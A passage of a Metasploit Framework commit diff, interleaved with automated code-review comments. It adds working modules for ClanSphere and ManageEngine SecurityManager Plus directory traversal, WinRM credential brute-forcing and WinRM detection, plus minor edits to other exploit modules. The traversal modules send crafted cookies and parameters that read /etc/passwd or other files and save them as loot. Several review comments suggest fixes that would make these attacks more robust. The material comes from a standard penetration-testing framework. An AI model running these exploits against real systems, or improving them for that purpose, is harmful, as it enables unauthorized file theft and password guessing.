+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The URI path to the web application', '/clansphere_2011.3/']),
+ OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']),
+ OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10])
+ ], self.class)
+ end
+
+
+ def run_host(ip)
+ base = target_uri.path
+ base << '/' if base[-1,1] != '/'
+
+ peer = "#{ip}:#{rport}"
+
+ print_status("#{peer} - Reading '#{datastore['FILE']}'")
+
+ traverse = "../" * datastore['DEPTH']
+ f = datastore['FILE']
+ f = f[1, f.length] if f =~ /^\//
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => "#{base}index.php",
+ 'cookie' => "blah=blah; cs_lang=#{traverse}#{f}%00.png"
+ })
+
+ if res and res.body =~ /^Fatal error\:/
+ print_error("#{peer} - Unable to read '#{datastore['FILE']}', possibily because:")
+ print_error("\t1. File does not exist.")
+ print_error("\t2. No permission.")
+ print_error("\t3. #{ip} isn't vulnerable to null byte poisoning.")
+
+ elsif res and res.code == 200
+ pattern_end = " UTC +1 - Load:"
+ data = res.body.scan(/\<div id\=\"bottom\"\>\n(.+)\n\x20{5}UTC.+/m).flatten[0].lstrip
+ fname = datastore['FILE']
+ p = store_loot(
+ 'clansphere.cms',
+ 'application/octet-stream',
+ ip,
+ data,
+ fname
+ )
+
+ vprint_line(data)
+ print_good("#{peer} - #{fname} stored as '#{p}'")
+
+ else
+ print_error("#{peer} - Fail to obtain file for some unknown reason")
+ end
+ end
+
+end
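Review bot: In run_host the success branch does `res.body.scan(...).flatten[0].lstrip`; when the response is 200 but the `<div id="bottom">` block is absent, `flatten[0]` is nil and `lstrip` raises NoMethodError, aborting the host instead of reporting a failure. Capture with `m = res.body.match(/\<div id\=\"bottom\"\>\n(.+)\n\x20{5}UTC.+/m)` and fall through to the error branch when `m` is nil, and drop the unused local `pattern_end`. `base << '/'` mutates the String returned by `target_uri.path` in place, which also alters the URI object if that is its own path String — `base += '/'` or `base = base.dup` first avoids the side effect. The same `base << '/'` pattern is in the manageengine_securitymanager_traversal.rb file in this commit. `possibily` in the first print_error should read `possibly`.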
2  modules/auxiliary/scanner/http/ektron_cms400net.rb
@@ -67,7 +67,7 @@ def run_host(ip)
#Check for HTTP 200 response.
#Numerous versions and configs make if difficult to further fingerprint.
- if (res.code == 200)
+ if (res and res.code == 200)
print_status("Ektron CMS400.NET install found at #{target_url} [HTTP 200]")
#Gather __VIEWSTATE and __EVENTVALIDATION from HTTP response.
2  modules/auxiliary/scanner/http/enum_wayback.rb
@@ -22,7 +22,7 @@ def initialize(info = {})
This module pulls and parses the URLs stored by Archive.org for the purpose of
replaying during a web assessment. Finding unlinked and old pages.
},
- 'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
+ 'Author' => [ 'mubix' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
))
2  modules/auxiliary/scanner/http/httpbl_lookup.rb
@@ -23,7 +23,7 @@ def initialize(info = {})
This module can be used to enumerate information
about an IP addresses from Project HoneyPot's HTTP Block List.
},
- 'Author' => [ 'Rob Fuller <mubix[at]rapid7.com>' ],
+ 'Author' => [ 'mubix' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
2  modules/auxiliary/scanner/http/litespeed_source_disclosure.rb
@@ -30,7 +30,7 @@ def initialize
[ 'CVE', '2010-2333' ],
[ 'OSVDB', '65476' ],
[ 'BID', '40815' ],
- [ 'EDB', 13850 ]
+ [ 'EDB', '13850' ]
],
'Author' =>
[
2  modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb
@@ -34,7 +34,7 @@ module will attempt to download the Majordomo config.pl file.
['CVE', '2011-0063'],
['URL', 'https://sitewat.ch/en/Advisory/View/1'],
['URL', 'http://sotiriu.de/adv/NSOADV-2011-003.txt'],
- ['EDB', 16103]
+ ['EDB', '16103']
],
'DisclosureDate' => 'Mar 08 2011',
'License' => MSF_LICENSE
0  .../auxiliary/scanner/http/manageengine_traversal.rb → ...anner/http/manageengine_deviceexpert_traversal.rb
File renamed without changes
92 modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb
@@ -0,0 +1,92 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'ManageEngine SecurityManager Plus 5.5 Directory Traversal',
+ 'Description' => %q{
+ This module exploits a directory traversal flaw found in ManageEngine
+ SecurityManager Plus 5.5 or less. When handling a file download request,
+ the DownloadServlet class fails to properly check the 'f' parameter, which
+ can be abused to read any file outside the virtual directory.
+ },
+ 'References' =>
+ [
+ ['OSVDB', '86563'],
+ ['EDB', '22092']
+ ],
+ 'Author' =>
+ [
+ 'blkhtc0rp', #Original
+ 'sinn3r'
+ ],
+ 'License' => MSF_LICENSE,
+ 'DisclosureDate' => "Oct 19 2012"
+ ))
+
+ register_options(
+ [
+ OptPort.new('RPORT', [true, 'The target port', 6262]),
+ OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
+ OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']),
+ OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10])
+ ], self.class)
+ end
+
+
+ def run_host(ip)
+ base = target_uri.path
+ base << '/' if base[-1,1] != '/'
+
+ peer = "#{ip}:#{rport}"
+ fname = datastore['FILE']
+
+ print_status("#{peer} - Reading '#{datastore['FILE']}'")
+ traverse = "../" * datastore['DEPTH']
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => "#{base}store",
+ 'vars_get' => {
+ 'f' => "#{traverse}#{datastore['FILE']}"
+ }
+ })
+
+
+ if res and res.code == 500 and res.body =~ /Error report/
+ print_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:")
+ print_error("\t1. File does not exist.")
+ print_error("\t2. The server does not have any patches deployed.")
+ print_error("\t3. Your 'DEPTH' option isn't deep enough.")
+ print_error("\t4. Some kind of permission issues.")
+
+ elsif res and res.code == 200
+ data = res.body
+ p = store_loot(
+ 'manageengine.securitymanager',
+ 'application/octet-stream',
+ ip,
+ data,
+ fname
+ )
+
+ vprint_line(data)
+ print_good("#{peer} - #{fname} stored as '#{p}'")
+
+ else
+ print_error("#{peer} - Fail to obtain file for some unknown reason")
+ end
+ end
+
+end
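Review bot: The `elsif res and res.code == 200` branch stores `res.body` as loot on the status code alone, so any 200 response from the servlet (an HTML landing or error page, for instance) would be reported as the requested file; at minimum checking that the body is non-empty before `store_loot` reduces false positives. Unlike the clansphere module in this commit, a leading `/` in FILE is not stripped before it is appended to `traverse`, so the default `/etc/passwd` produces `../..//etc/passwd`; that usually still resolves, but normalising the same way keeps the two modules consistent. `and` in `res and res.code == 500 and res.body =~ /Error report/` should be `&&`, and the `print_status` line can use the `fname` local assigned just above it.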
4 modules/auxiliary/scanner/http/nginx_source_disclosure.rb
@@ -31,8 +31,8 @@ def initialize
[ 'CVE', '2010-2263' ],
[ 'OSVDB', '65531' ],
[ 'BID', '40760' ],
- [ 'EDB', 13818 ],
- [ 'EDB', 13822 ]
+ [ 'EDB', '13818' ],
+ [ 'EDB', '13822' ]
],
'Author' =>
[
4 modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb
@@ -89,8 +89,8 @@ def enum_user(user='administrator', pass='pass')
'Content-Type' => 'text/xml; charset=UTF-8',
}
}, 45)
- return :abort if (res.code == 404)
- success = true if(res.body.match(/SessionInfo/i))
+ return :abort if (!res or (res and res.code == 404))
+ success = true if(res and res.body.match(/SessionInfo/i))
success
rescue ::Rex::ConnectionError
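Review bot: `return :abort if (!res or (res and res.code == 404))` is redundant: once `!res` is false, `res` is truthy and `(res and ...)` reduces to `res.code == 404`, so `return :abort if !res || res.code == 404` says the same thing, and the following `success = true if(res and res.body.match(/SessionInfo/i))` can drop its `res and` because the guard has already returned on nil. The same shape is introduced in sap_businessobjects_user_brute_web.rb (`!res or (res and res.code != 200)`) and in sap_businessobjects_user_enum.rb, where it sits inside an existing `if res` block so the `!res` half is dead code. enum_user's begin/rescue extends beyond the hunk.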
2  modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb
@@ -75,7 +75,7 @@ def enum_user(user, pass)
'Accept-Encoding' => "gzip,deflate",
},
}, 45)
- return :abort if (res.code != 200)
+ return :abort if (!res or (res and res.code != 200))
if(res.body.match(/Account Information/i))
success = false
else
4 modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb
@@ -93,8 +93,8 @@ def enum_user(user='administrator', pass='invalid-sap-password-0d03b389-b7a1-4ec
}, 45)
if res
- return :abort if (res.code == 404)
- success = true if(res.body.match(/Invalid password/i))
+ return :abort if (!res or (res and res.code == 404))
+ success = true if(res and res.body.match(/Invalid password/i))
success
else
vprint_error("[SAP BusinessObjects] No response")
2  modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb
@@ -126,6 +126,8 @@ def enum_user(user, pass)
}
}, 45)
+ return if not res
+
if (res.code != 500 and res.code != 200)
return
else
2  modules/auxiliary/scanner/smb/smb_version.rb
@@ -101,6 +101,8 @@ def run_host(ip)
conf[:os_sp] = res['sp'] if res['sp']
conf[:os_lang] = res['lang'] if res['os'] =~ /Windows/
+ conf[:SMBName] = simple.client.default_name if simple.client.default_name
+ conf[:SMBDomain] = simple.client.default_domain if simple.client.default_domain
report_note(
:host => ip,
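Review bot: The two new keys `:SMBName` and `:SMBDomain` break the naming convention of the surrounding `conf` hash, whose other keys are lowercase snake_case symbols (`:os_sp`, `:os_lang`); unless a consumer of this note already expects the CamelCase keys, `:smb_name` and `:smb_domain` would be consistent. Each line also calls the accessor twice (`conf[:SMBName] = simple.client.default_name if simple.client.default_name`); `name = simple.client.default_name` followed by `conf[:smb_name] = name if name` avoids the repeat. run_host and the report_note call continue outside the hunk.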
2  modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb
@@ -28,7 +28,7 @@ def initialize
[
['BID', '51182'],
['CVE', '2011-4862'],
- ['EDB', 18280],
+ ['EDB', '18280'],
['URL', 'https://community.rapid7.com/community/metasploit/blog/2011/12/28/more-fun-with-bsd-derived-telnet-daemons']
]
)
2  modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb
@@ -30,7 +30,7 @@ def initialize(info={})
[
['OSVDB', '77455'],
['BID', '50890'],
- ['EDB', 18189],
+ ['EDB', '18189'],
['URL', 'http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt']
],
'DisclosureDate' => "Dec 12 2011"
64 modules/auxiliary/scanner/winrm/winrm_auth_methods.rb
@@ -0,0 +1,64 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'rex/proto/ntlm/message'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::WinRM
+ include Msf::Auxiliary::Report
+
+
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'WinRM Authentication Method Detection',
+ 'Version' => '$Revision$',
+ 'Description' => %q{
+ This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service.
+ If it is a WinRM service, it also gathers the Authentication Methods supported.
+ },
+ 'Author' => [ 'thelightcosine' ],
+ 'License' => MSF_LICENSE
+ )
+
+ deregister_options('USERNAME', 'PASSWORD')
+
+ end
+
+
+ def run_host(ip)
+ resp = winrm_poke
+ return nil if resp.nil?
+ if resp.code == 401 and resp.headers['Server'].include? "Microsoft-HTTPAPI"
+ methods = parse_auth_methods(resp)
+ desc = resp.headers['Server'] + " Authentication Methods: " + methods.to_s
+ report_service(
+ :host => ip,
+ :port => rport,
+ :proto => 'tcp',
+ :name => 'winrm',
+ :info => desc
+ )
+ print_good "#{ip}:#{rport}: Negotiate protocol supported" if methods.include? "Negotiate"
+ print_good "#{ip}:#{rport}: Kerberos protocol supported" if methods.include? "Kerberos"
+ print_good "#{ip}:#{rport}: Basic protocol supported" if methods.include? "Basic"
+ else
+ print_error "#{ip}:#{rport} Does not appear to be a WinRM server"
+ end
+ end
+
+
+end
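Review bot: `resp.headers['Server'].include? "Microsoft-HTTPAPI"` raises NoMethodError on a 401 response that carries no Server header, assuming the header hash returns nil for a missing key; `resp.headers['Server'].to_s.include?("Microsoft-HTTPAPI")` keeps the check safe, and the same `.to_s` belongs on the `desc = resp.headers['Server'] + ...` line that follows. The local `methods` shadows `Object#methods`, which is legal but confusing inside a mixin-heavy class; `auth_methods` would read better. `methods.to_s` in `desc` relies on Array#to_s output, so `methods.join(', ')` would give a cleaner service-info string.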
79 modules/auxiliary/scanner/winrm/winrm_login.rb
@@ -0,0 +1,79 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'rex/proto/ntlm/message'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::WinRM
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::AuthBrute
+
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'WinRM Login Utility',
+ 'Version' => '$Revision$',
+ 'Description' => %q{
+ This module attempts to authenticate to a WinRM service. It currently
+ works only if the remote end allows Negotiate(NTLM) authentication.
+ Kerberos is not currently supported.
+ },
+ 'Author' => [ 'thelightcosine' ],
+ 'References' =>
+ [
+ [ 'CVE', '1999-0502'] # Weak password
+ ],
+ 'License' => MSF_LICENSE
+ )
+
+ end
+
+
+ def run_host(ip)
+ unless accepts_ntlm_auth
+ print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
+ return
+ end
+ each_user_pass do |user, pass|
+ resp,c = send_request_ntlm(test_request)
+ if resp.nil?
+ print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out"
+ return
+ elsif resp.code == 200
+ cred_hash = {
+ :host => ip,
+ :port => rport,
+ :sname => 'winrm',
+ :pass => pass,
+ :user => user,
+ :source_type => "user_supplied",
+ :active => true
+ }
+ report_auth_info(cred_hash)
+ print_good "#{ip}:#{rport}: Valid credential found: #{user}:#{pass}"
+ elsif resp.code == 401
+ print_error "#{ip}:#{rport}: Login failed: #{user}:#{pass}"
+ else
+ print_error "Recieved unexpected Response Code: #{resp.code}"
+ end
+ end
+ end
+
+
+ def test_request
+ data = winrm_wql_msg("Select Name,Status from Win32_Service")
+ end
+
+end
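Review bot: Inside `each_user_pass do |user, pass|` the block parameters are never handed to `send_request_ntlm(test_request)`, so the request must obtain the credentials elsewhere (presumably datastore values the AuthBrute mixin sets per iteration); a one-line comment saying where they come from would stop the next reader from suspecting every attempt sends the same credentials. The message in the first guard has an unbalanced parenthesis, `"The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"` → `"The Remote WinRM server (#{ip}) does not appear to allow Negotiate(NTLM) auth"`, and `Recieved` should be `Received`. `resp,c = send_request_ntlm(test_request)` leaves `c` unused (`resp, _conn = ...`), and `test_request` assigns `data` only to return it, so `winrm_wql_msg("Select Name,Status from Win32_Service")` alone is the equivalent body.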
2  modules/auxiliary/server/capture/drda.rb
@@ -38,7 +38,7 @@ class Constants
def initialize
super(
'Name' => 'Authentication Capture: DRDA (DB2, Informix, Derby)',
- 'Version' => '$Revision: 14774 $',
+ 'Version' => '$Revision$',
'Description' => %q{
This module provides a fake DRDA (DB2, Informix, Derby) server
that is designed to capture authentication credentials.
3  modules/auxiliary/server/http_ntlmrelay.rb
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'HTTP Client MS Credential Relayer',
- 'Version' => '$Revision:$',
+ 'Version' => '$Revision$',
'Description' => %q{
This module relays negotiated NTLM Credentials from an HTTP server to multiple
protocols. Currently, this module supports relaying to SMB and HTTP.
@@ -52,7 +52,6 @@ def initialize(info = {})
[
'Rich Lundeen <richard.lundeen[at]gmail.com>',
],
- 'Version' => '$Revision:$',
'License' => MSF_LICENSE,
'Actions' =>
[
2  modules/auxiliary/spoof/dns/bailiwicked_domain.rb
@@ -144,7 +144,7 @@ def cmd_check(*args)
end
if(reps < 30)
- print_status("WARNING: This server did not reply to all of our requests")
+ print_warning("WARNING: This server did not reply to all of our requests")
end
if(random)
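Review bot: Now that the line goes through `print_warning`, the literal `WARNING: ` prefix inside the message is redundant if print_warning already marks the line as a warning; `print_warning("This server did not reply to all of our requests")` is enough. The same duplicated prefix is in the bailiwicked_host.rb hunk. cmd_check starts outside the hunk.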
2  modules/auxiliary/spoof/dns/bailiwicked_host.rb
@@ -134,7 +134,7 @@ def cmd_check(*args)
end
if(reps < 30)
- print_status("WARNING: This server did not reply to all of our requests")
+ print_warning("WARNING: This server did not reply to all of our requests")
end
if(random)
2  modules/auxiliary/vsploit/pii/web_pii.rb
@@ -25,7 +25,7 @@ def initialize(info = {})
'Description' => 'This module emulates a webserver leaking PII data',
'License' => MSF_LICENSE,
'Author' => 'MJC',
- 'Version' => '$Revision: $',
+ 'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.metasploit.com'],
2  modules/encoders/x86/context_cpuid.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback
def initialize
super(
'Name' => 'CPUID-based Context Keyed Payload Encoder',
- 'Version' => '$Revision: 1$',
+ 'Version' => '$Revision$',
'Description' => %q{
This is a Context-Keyed Payload Encoder based on CPUID and Shikata Ga Nai.
},
2  modules/exploits/freebsd/tacacs/xtacacsd_report.rb
@@ -41,7 +41,7 @@ def initialize(info = {})
'PrependEncoder' => "\x83\xec\x7f",
'DisableNops' => 'True',
},
- 'Platform' => 'BSD',
+ 'Platform' => 'bsd',
'Arch' => ARCH_X86,
'Targets' =>
[
2  modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
@@ -33,7 +33,7 @@ def initialize(info = {})
['CVE', '2011-4862'],
['OSVDB', '78020'],
['BID', '51182'],
- ['EDB', 18280]
+ ['EDB', '18280']
],
'Privileged' => true,
'Platform' => 'bsd',
1  modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
@@ -70,6 +70,7 @@ def check
end
def on_new_session(client)
+ print_warning("Deleting temp.php")
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
client.fs.file.rm("temp.php")
4 modules/exploits/linux/http/webid_converter.rb
@@ -31,7 +31,7 @@ def initialize(info = {})
[ 'OSVDB', '73609' ],
[ 'EDB', '17487' ]
],
- 'Version' => '$Revision: $',
+ 'Version' => '$Revision$',
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
@@ -109,7 +109,7 @@ def on_new_session(client)
res = client.fs.file.search(nil, "currencies.php", true, -1)
res.each do |hit|
filename = "#{hit['path']}/#{hit['name']}"
- print_status("#{peer} - Restoring #(unknown)")
+ print_warning("#{peer} - Restoring #(unknown)")
client.fs.file.rm(filename)
fd = client.fs.file.new(filename, "wb")
fd.write(currencies_php)
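Review bot: The message `"#{peer} - Restoring #(unknown)"` looks like a mangled interpolation: `filename` is built on the line above and is the file the `rm`/`new` calls below operate on, so the log line should name it as `#{filename}`. The `#(unknown)` may well be a rendering artifact of this page rather than the source text, so verify against the file before changing it. The hunk only swaps print_status for print_warning and keeps the text as is; on_new_session starts outside the hunk.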
2  modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
@@ -33,7 +33,7 @@ def initialize(info = {})
'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
],
'License' => MSF_LICENSE,
- 'Version' => '$Revision: 3 $',
+ 'Version' => '$Revision$',
'Privileged' => false,
'Arch' => ARCH_CMD,
'Platform' => 'unix',
1  modules/exploits/linux/local/sock_sendpage.rb
@@ -13,6 +13,7 @@
require 'msf/core/exploit/local/linux_kernel'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/local/unix'
+require 'msf/core/exploit/exe'
#load 'lib/msf/core/